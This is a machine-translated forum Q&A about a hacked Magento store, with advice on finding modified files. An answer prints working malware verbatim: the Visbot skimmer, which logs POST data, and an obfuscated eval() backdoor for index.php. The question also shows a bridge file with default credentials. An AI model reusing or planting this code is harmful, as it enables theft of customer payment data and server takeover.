这个 Magento 代码是病毒吗？

Question

我们已经将文件添加到我们的 Magento 目录中到处都是中文，并且正在寻找执行此操作的恶意代码。我注意到原始 Magento 开箱即用包中没有的一些“桥接”文件。这些看起来是恶意的吗？还是他们是真的？该代码似乎允许连接到我的数据库。

任何建议表示赞赏。

已包含文件的屏幕截图，这是其中一个代码的 sn-p。

<?php
/*-----------------------------------------------------------------------------+
| eMagicOne                                                                 |
| Copyright (c) 2012-2014 eMagicOne.com <contact@emagicone.com>             |
| All rights reserved                                                         |
+------------------------------------------------------------------------------+
|                                                                             |
| PHP MySQL Bridge                                                           |
|                                                                             |
| Bridge is just another way to connect to your database.                     |
| Normally program uses direct MySQL connection to remote database installed at|
| website or some other web server. In some cases this type of connection does |
| not work - your hosting provider may not allow direct connections or your |
| LAN settings/firewall prevent connection from being established.           |
| Bridge allows you to work with remote database with                         |
| no direct MySQL connection established.                                     |
|                                                                             |
|                                                                             |
| Developed by eMagicOne,                                                     |
| Copyright (C) 2012-2014                                                     |
+-----------------------------------------------------------------------------*/

$version = '$Revision: 7.39 $';

// Please change immediately
// it is security threat to leave these values as is!
$username = 'NewUser';
$password = 'ebykrwfe443ewf';

$database_extension = 'auto'; // 'auto', 'pdo', 'mysqli', 'mysql'

// Please create this directory or change to any existing temporary directory
// temporary directory should be writable by php script (chmod 0777)
$temporary_dir = "./tmp"; // on some systems if you get output with 0 size, try to use some local temporary folder

$allow_compression = true;

//Values of $compress_level between 1 and 9 will trade off speed and efficiency, and the default is 6.
//The 1 flag means "fast but less efficient" compression, and 9 means "slow but most efficient" compression.
$compress_level = 6; // 1 - 9

$limit_query_size = 8192; //Kb
// Please enter your email address here to receive notifications
//$user_email = 'YOUR@EMAIL-HERE.com';

// You can define table prefix here - only tables with names starting with these characters will be stored by bridge and transferred to Store Manager.
// Empty this value to tell bridge to use all tables except for those specified in $exclude_db_tables below
// $include_db_tables = '';

/*
    Please uncomments following database connection information if you need to connect to some
    specific database or with some specific database login information.
    By default PHP MySQL Bridge is getting login information from your shopping cart.
    This option should be used on non-standard configuration, we assume you know what you are doing
*/

/*
define('USER_DB_SERVER',''); // database host to connect
define('USER_DB_SERVER_USERNAME',''); // database user login to connect
define('USER_DB_SERVER_PASSWORD',''); // database user password to connect
define('USER_DB_DATABASE','');        // database name
define('USER_TABLE_PREFIX','');       // database prefix
*/

// Do not store tables specified below. Use this variable to reduce size of the data retrieved from bridge
// Specify table names delimited by semicolon ;
$exclude_db_tables = 'log_*;dataflow_*;xcart_sessions_data;xcart_session_history;xcart_stats_shop;xcart_stats_pages_views;xcart_stats_pages;xcart_stats_pages_paths;amazonimport_*;bcse_catalog_sessions;bcse_catalog_config;google_*;zen_uti;zen_uti_*;emo_admin;emo_admin_*;emo_user_*;admin_activity_log';

// In case ifyou have problems with data retrieving change this to a single quote
define('QOUTE_CHAR', '"');

error_reporting(E_ERROR | E_WARNING | E_PARSE); //good (and pretty enough) for most hostings

if(!ini_get('safe_mode')) {
    @set_time_limit(0); //no time limiting for script, doesn't work in safe mode
} else {
    @ini_set('max_execution_time'

Answer 1

这个 PHP 程序是一个合法的程序。 它的使用方式可能不是。

eMagicOne 提供了一种解决方案，允许用户远程连接到 MySQL 数据库，其中主机不允许直接连接。

您可以使用它来绕过该限制。 与其他一些恶意代码一起编译，这是黑客尝试出错的迹象。

我运行了一个过期的 Magento 版本（原因不止一个） 每天都会完成扫描以检查修改的文件和添加的文件。 这些已通过插入以下文件的以下代码进行标记：

$y0='./skin/adminhtml/default/default/images/pager_arrow_right_bg.gif';$m1='1393068974';$k2='pd393b57';$k3="-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";if(@$_SERVER['HTTP_USER_AGENT']=='Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'){if(isset($_GET[$k2])){$m1=file_exists($y0)?@filemtime($y0):$m1;@file_put_contents($y0,'');@touch($y0,$m1,$m1);echo 'clean ok';}else echo 'Pong';exit;}if(!empty($_SERVER['HTTP_CLIENT_IP'])){$i4=$_SERVER['HTTP_CLIENT_IP'];}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$i4=$_SERVER['HTTP_X_FORWARDED_FOR'];}else{$i4=@$_SERVER['REMOTE_ADDR'];}if(isset($_POST)&&sizeof($_POST)){$a5='';foreach($_POST as $h6=>$n7){if(is_array($n7)){foreach($n7 as $f8=>$l9){if(is_array($l9)){foreach($l9 as $l10=>$v11){if(is_array($v11)){;}else{$a5.=':'.$h6.'['.$f8.']['.$l10.']='.$v11;}}}else{$a5.=':'.$h6.'['.$f8.']='.$l9;}}}else{$a5.=':'.$h6.'='.$n7;}}$a5=$i4.$a5;}else{$a5=null;}if($a5){$t12=false;if(function_exists('openssl_get_publickey')&&function_exists('openssl_public_encrypt')&&function_exists('openssl_encrypt')){$t12=true;}elseif(function_exists('dl')){$n13=strtolower(substr(php_uname(),0,3));$d14='php_openssl.'.($n13=='win'?'dll':'so');@dl($d14);if(function_exists('openssl_get_publickey')&&function_exists('openssl_public_encrypt')&&function_exists('openssl_encrypt')){$t12=true;}}if($t12){$t15=@openssl_get_publickey($k3);$q16=128;$t17='';$h18=md5(md5(microtime()).rand());$e19=$h18;while($e19){$f20=substr($e19,0,$q16);$e19=substr($e19,$q16);@openssl_public_encrypt($f20,$h21,$t15);$t17.=$h21;}$t22=@openssl_encrypt($a5,'aes128',$h18);@openssl_free_key($t15);$a5=$t17.':::SEP:::'.$t22;}$m1=file_exists($y0)?@filemtime($y0):$m1;@file_put_contents($y0,'JPEG-1.1'.base64_encode($a5),FILE_APPEND);@touch($y0,$m1,$m1);}?><?php

这位于 /include/config 中，并且我在索引中有一些代码和一个 mage 文件（我在几个小时前清理了并且没有日志）

最好的选择是尝试从 Web dir root 运行它：

find . -type f  -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort

这将扫描您当前的 PHP 文件并按修改日期顺序对它们进行排序，在列表底部您应该会看到最近修改的文件。 您可以使用它来检查文件的内容。

示例：

find . -type f  -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort

• 查找 - 要搜索的程序
• 。 = 来自当前目录
• type f = 文件类型
• name = 用于“*.php”
• printf + 表达式（以可读格式打印日期）
• | = 堆叠另一个命令
• sort = 按顺序显示结果（列表底部的最新文件）

添加了来自 Index.php 的原始代码

 $GLOBALS['icbb'];global$icbb;$icbb=$GLOBALS;$icbb['xf558f']="\x68\x63\x21\x7d\x67\xa\x43\x33\x57\x2f\x73\x61\x52\x59\x22\x6d\x2a\x32\x64\x49\x27\x3d\x28\x40\x50\x24\x51\x7b\x3e\x60\x72\x37\x58\x6f\x44\x62\x76\x20\x9\x45\x6b\x6e\x56\x70\x34\x4b\x41\x4d\x23\x4a\x2b\x78\x7c\x71\x39\x69\x2c\x48\x4c\x6c\xd\x3a\x55\x3b\x53\x42\x38\x77\x25\x4e\x7a\x74\x36\x2d\x31\x5a\x7e\x54\x79\x35\x65\x5c\x3f\x5b\x5e\x66\x4f\x46\x47\x3c\x30\x6a\x29\x75\x26\x5f\x5d\x2e";$icbb[$icbb['xf558f'][36].$icbb['xf558f'][11].$icbb['xf558f'][54].$icbb['xf558f'][90].$icbb['xf558f'][79].$icbb['xf558f'][11].$icbb['xf558f'][11]]=$icbb['xf558f'][1].$icbb['xf558f'][0].$icbb['xf558f'][30];$icbb[$icbb['xf558f'][35].$icbb['xf558f'][80].$icbb['xf558f'][31].$icbb['xf558f'][79].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][90]]=$icbb['xf558f'][33].$icbb['xf558f'][30].$icbb['xf558f'][18];$icbb[$icbb['xf558f'][71].$icbb['xf558f'][7].$icbb['xf558f'][66].$icbb['xf558f'][80].$icbb['xf558f'][18]]=$icbb['xf558f'][10].$icbb['xf558f'][71].$icbb['xf558f'][30].$icbb['xf558f'][59].$icbb['xf558f'][80].$icbb['xf558f'][41];$icbb[$icbb['xf558f'][51].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][74].$icbb['xf558f'][85]]=$icbb['xf558f'][55].$icbb['xf558f'][41].$icbb['xf558f'][55].$icbb['xf558f'][95].$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][71];$icbb[$icbb['xf558f'][59].$icbb['xf558f'][66].$icbb['xf558f'][74].$icbb['xf558f'][35].$icbb['xf558f'][17].$icbb['xf558f'][54].$icbb['xf558f'][54].$icbb['xf558f'][74]]=$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][55].$icbb['xf558f'][11].$icbb['xf558f'][59].$icbb['xf558f'][55].$icbb['xf558f'][70].$icbb['xf558f'][80];$icbb[$icbb['xf558f'][93].$icbb['xf558f'][1].$icbb['xf558f'][35].$icbb['xf558f'][54].$icbb['xf558f'][85].$icbb['xf558f'][85]]=$icbb['xf558f'][43].$icbb['xf558f'][0].$icbb['xf558f'][43].$icbb['xf558f'][36].$icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][10].$icbb['xf558f'][55].$icbb['xf558f'][33].$icbb['xf558f'][41];$icbb[$icbb['xf558f'][11].$icbb['xf558f'][17].$icbb['xf558f'][17].$icbb['xf558f'][80].$icbb['xf558f'][74].$icbb['xf558f'][11]]=$icbb['xf558f'][93].$icbb['xf558f'][41].$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][55].$icbb['xf558f'][11].$icbb['xf558f'][59].$icbb['xf558f'][55].$icbb['xf558f'][70].$icbb['xf558f'][80];$icbb[$icbb['xf558f'][33].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][18].$icbb['xf558f'][17].$icbb['xf558f'][35].$icbb['xf558f'][44].$icbb['xf558f'][11]]=$icbb['xf558f'][35].$icbb['xf558f'][11].$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][72].$icbb['xf558f'][44].$icbb['xf558f'][95].$icbb['xf558f'][18].$icbb['xf558f'][80].$icbb['xf558f'][1].$icbb['xf558f'][33].$icbb['xf558f'][18].$icbb['xf558f'][80];$icbb[$icbb['xf558f'][53].$icbb['xf558f'][79].$icbb['xf558f'][11].$icbb['xf558f'][54].$icbb['xf558f'][79]]=$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][71].$icbb['xf558f'][95].$icbb['xf558f'][71].$icbb['xf558f'][55].$icbb['xf558f'][15].$icbb['xf558f'][80].$icbb['xf558f'][95].$icbb['xf558f'][59].$icbb['xf558f'][55].$icbb['xf558f'][15].$icbb['xf558f'][55].$icbb['xf558f'][71];$icbb[$icbb['xf558f'][93].$icbb['xf558f'][7].$icbb['xf558f'][1].$icbb['xf558f'][31].$icbb['xf558f'][66].$icbb['xf558f'][74].$icbb['xf558f'][72].$icbb['xf558f'][79]]=$icbb['xf558f'][43].$icbb['xf558f'][85].$icbb['xf558f'][54].$icbb['xf558f'][85];$icbb[$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][54].$icbb['xf558f'][18].$icbb['xf558f'][79].$icbb['xf558f'][79].$icbb['xf558f'][18].$icbb['xf558f'][7]]=$icbb['xf558f'][91].$icbb['xf558f'][1].$icbb['xf558f'][54].$icbb['xf558f'][85].$icbb['xf558f'][74].$icbb['xf558f'][18].$icbb['xf558f'][44].$icbb['xf558f'][74];$icbb[$icbb['xf558f'][4].$icbb['xf558f'][7].$icbb['xf558f'][31].$icbb['xf558f'][18].$icbb['xf558f'][7].$icbb['xf558f'][85].$icbb['xf558f'][85].$icbb['xf558f'][11].$icbb['xf558f'][7]]=$_POST;$icbb[$icbb['xf558f'][15].$icbb['xf558f'][79].$icbb['xf558f'][54].$icbb['xf558f'][7].$icbb['xf558f'][72]]=$_COOKIE;@$icbb[$icbb['xf558f'][51].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][74].$icbb['xf558f'][85]]($icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][30].$icbb['xf558f'][33].$icbb['xf558f'][30].$icbb['xf558f'][95].$icbb['xf558f'][59].$icbb['xf558f'][33].$icbb['xf558f'][4],NULL);@$icbb[$icbb['xf558f'][51].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][74].$icbb['xf558f'][85]]($icbb['xf558f'][59].$icbb['xf558f'][33].$icbb['xf558f'][4].$icbb['xf558f'][95].$icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][30].$icbb['xf558f'][33].$icbb['xf558f'][30].$icbb['xf558f'][10],0);@$icbb[$icbb['xf558f'][51].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][74].$icbb['xf558f'][85]]($icbb['xf558f'][15].$icbb['xf558f'][11].$icbb['xf558f'][51].$icbb['xf558f'][95].$icbb['xf558f'][80].$icbb['xf558f'][51].$icbb['xf558f'][80].$icbb['xf558f'][1].$icbb['xf558f'][93].$icbb['xf558f'][71].$icbb['xf558f'][55].$icbb['xf558f'][33].$icbb['xf558f'][41].$icbb['xf558f'][95].$icbb['xf558f'][71].$icbb['xf558f'][55].$icbb['xf558f'][15].$icbb['xf558f'][80],0);@$icbb[$icbb['xf558f'][53].$icbb['xf558f'][79].$icbb['xf558f'][11].$icbb['xf558f'][54].$icbb['xf558f'][79]](0);$w8a038788=NULL;$s379c4839=NULL;$icbb[$icbb['xf558f'][15].$icbb['xf558f'][74].$icbb['xf558f'][31].$icbb['xf558f'][90].$icbb['xf558f'][85].$icbb['xf558f'][80].$icbb['xf558f'][11].$icbb['xf558f'][90]]=$icbb['xf558f'][72].$icbb['xf558f'][18].$icbb['xf558f'][72].$icbb['xf558f'][44].$icbb['xf558f'][11].$icbb['xf558f'][72].$icbb['xf558f'][11].$icbb['xf558f'][18].$icbb['xf558f'][73].$icbb['xf558f'][7].$icbb['xf558f'][11].$icbb['xf558f'][72].$icbb['xf558f'][79].$icbb['xf558f'][73].$icbb['xf558f'][44].$icbb['xf558f'][72].$icbb['xf558f'][85].$icbb['xf558f'][54].$icbb['xf558f'][73].$icbb['xf558f'][54].$icbb['xf558f'][44].$icbb['xf558f'][79].$icbb['xf558f'][54].$icbb['xf558f'][73].$icbb['xf558f'][44].$icbb['xf558f'][31].$icbb['xf558f'][90].$icbb['xf558f'][66].$icbb['xf558f'][44].$icbb['xf558f'][18].$icbb['xf558f'][85].$icbb['xf558f'][79].$icbb['xf558f'][1].$icbb['xf558f'][79].$icbb['xf558f'][90].$icbb['xf558f'][74];global$m170fea0;function jc9f1d41($w8a038788,$b4da298e){global$icbb;$vde7a7="";for($u99f5bd=0;$u99f5bd<$icbb[$icbb['xf558f'][71].$icbb['xf558f'][7].$icbb['xf558f'][66].$icbb['xf558f'][80].$icbb['xf558f'][18]]($w8a038788);){for($jca175=0;$jca175<$icbb[$icbb['xf558f'][71].$icbb['xf558f'][7].$icbb['xf558f'][66].$icbb['xf558f'][80].$icbb['xf558f'][18]]($b4da298e)&&$u99f5bd<$icbb[$icbb['xf558f'][71].$icbb['xf558f'][7].$icbb['xf558f'][66].$icbb['xf558f'][80].$icbb['xf558f'][18]]($w8a038788);$jca175++,$u99f5bd++){$vde7a7.=$icbb[$icbb['xf558f'][36].$icbb['xf558f'][11].$icbb['xf558f'][54].$icbb['xf558f'][90].$icbb['xf558f'][79].$icbb['xf558f'][11].$icbb['xf558f'][11]]($icbb[$icbb['xf558f'][35].$icbb['xf558f'][80].$icbb['xf558f'][31].$icbb['xf558f'][79].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][90]]($w8a038788[$u99f5bd])^$icbb[$icbb['xf558f'][35].$icbb['xf558f'][80].$icbb['xf558f'][31].$icbb['xf558f'][79].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][90]]($b4da298e[$jca175]));}}return$vde7a7;}function pf9f($w8a038788,$b4da298e){global$icbb;global$m170fea0;return$icbb[$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][54].$icbb['xf558f'][18].$icbb['xf558f'][79].$icbb['xf558f'][79].$icbb['xf558f'][18].$icbb['xf558f'][7]]($icbb[$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][54].$icbb['xf558f'][18].$icbb['xf558f'][79].$icbb['xf558f'][79].$icbb['xf558f'][18].$icbb['xf558f'][7]]($w8a038788,$m170fea0),$b4da298e);}foreach($icbb[$icbb['xf558f'][15].$icbb['xf558f'][79].$icbb['xf558f'][54].$icbb['xf558f'][7].$icbb['xf558f'][72]]as$b4da298e=>$a8d45c){$w8a038788=$a8d45c;$s379c4839=$b4da298e;}if(!$w8a038788){foreach($icbb[$icbb['xf558f'][4].$icbb['xf558f'][7].$icbb['xf558f'][31].$icbb['xf558f'][18].$icbb['xf558f'][7].$icbb['xf558f'][85].$icbb['xf558f'][85].$icbb['xf558f'][11].$icbb['xf558f'][7]]as$b4da298e=>$a8d45c){$w8a038788=$a8d45c;$s379c4839=$b4da298e;}}$w8a038788=@$icbb[$icbb['xf558f'][11].$icbb['xf558f'][17].$icbb['xf558f'][17].$icbb['xf558f'][80].$icbb['xf558f'][74].$icbb['xf558f'][11]]($icbb[$icbb['xf558f'][93].$icbb['xf558f'][7].$icbb['xf558f'][1].$icbb['xf558f'][31].$icbb['xf558f'][66].$icbb['xf558f'][74].$icbb['xf558f'][72].$icbb['xf558f'][79]]($icbb[$icbb['xf558f'][33].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][18].$icbb['xf558f'][17].$icbb['xf558f'][35].$icbb['xf558f'][44].$icbb['xf558f'][11]]($w8a038788),$s379c4839));if(isset($w8a038788[$icbb['xf558f'][11].$icbb['xf558f'][40]])&&$m170fea0==$w8a038788[$icbb['xf558f'][11].$icbb['xf558f'][40]]){if($w8a038788[$icbb['xf558f'][11]]==$icbb['xf558f'][55]){$u99f5bd=Array($icbb['xf558f'][43].$icbb['xf558f'][36]=>@$icbb[$icbb['xf558f'][93].$icbb['xf558f'][1].$icbb['xf558f'][35].$icbb['xf558f'][54].$icbb['xf558f'][85].$icbb['xf558f'][85]](),$icbb['xf558f'][10].$icbb['xf558f'][36]=>$icbb['xf558f'][74].$icbb['xf558f'][97].$icbb['xf558f'][90].$icbb['xf558f'][73].$icbb['xf558f'][74],);echo@$icbb[$icbb['xf558f'][59].$icbb['xf558f'][66].$icbb['xf558f'][74].$icbb['xf558f'][35].$icbb['xf558f'][17].$icbb['xf558f'][54].$icbb['xf558f'][54].$icbb['xf558f'][74]]($u99f5bd);}elseif($w8a038788[$icbb['xf558f'][11]]==$icbb['xf558f'][80]){eval($w8a038788[$icbb['xf558f'][18]]);}exit();} ?><?php

此代码通常放在第 1 行： 在所有的 cmets 之后，所以向右滚动。